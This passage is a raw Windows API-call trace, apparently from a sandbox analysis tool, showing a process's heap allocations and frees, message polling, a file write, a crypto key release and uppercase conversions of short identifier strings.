Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9120) returned 0x34bb378 [0188.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9120) returned 0x34cd5c8 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bb378 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9120) returned 0x34bb378 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cd5c8 | out: hHeap=0x25c0000) returned 1 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9120) returned 0x34cd5c8 [0188.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34bb378 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e9ca8 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c44a0 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0188.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e0b80 | out: hHeap=0x25c0000) returned 1 [0188.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0188.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9120) returned 0x34b2250 [0188.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cd5c8 | out: hHeap=0x25c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.392] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.392] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.392] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.392] WriteFile (in: hFile=0x294, lpBuffer=0x24d7a58*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x24d7a58*, lpNumberOfBytesWritten=0x8bf5ec*=0x9120, lpOverlapped=0x0) returned 1 [0188.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.396] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.396] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.396] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.397] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.397] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.397] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.397] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.398] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.398] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.398] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.398] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.398] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.399] CryptDestroyKey (hKey=0xaa5860) returned 1 [0188.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.399] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.399] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.399] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.399] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.399] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.399] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.399] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.399] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.399] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.400] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.400] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.400] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.400] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.400] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.400] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.400] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.400] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.400] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 